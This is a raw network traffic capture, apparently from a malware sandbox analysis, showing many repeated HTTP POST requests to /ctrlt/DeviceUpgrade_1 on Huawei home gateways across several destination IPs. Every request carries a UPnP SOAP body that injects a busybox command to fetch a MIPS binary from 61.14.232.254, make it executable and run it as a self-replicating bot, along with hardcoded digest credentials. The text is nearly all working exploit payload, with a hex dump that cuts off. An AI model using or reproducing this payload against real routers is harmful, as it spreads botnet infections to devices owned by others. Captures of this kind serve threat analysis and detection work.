                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                  May 29, 2024 15:15:25.034718037 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                  May 29, 2024 15:15:25.522649050 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2228192.168.2.1335810157.106.59.4937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.741727114 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                  May 29, 2024 15:15:25.034724951 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                  May 29, 2024 15:15:25.522644997 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2229192.168.2.1346858197.231.134.19537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.741991997 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                  May 29, 2024 15:15:25.034710884 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                  May 29, 2024 15:15:25.522665024 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2230192.168.2.1360712204.178.193.24537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.742189884 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                  May 29, 2024 15:15:25.034714937 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                  May 29, 2024 15:15:25.522649050 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 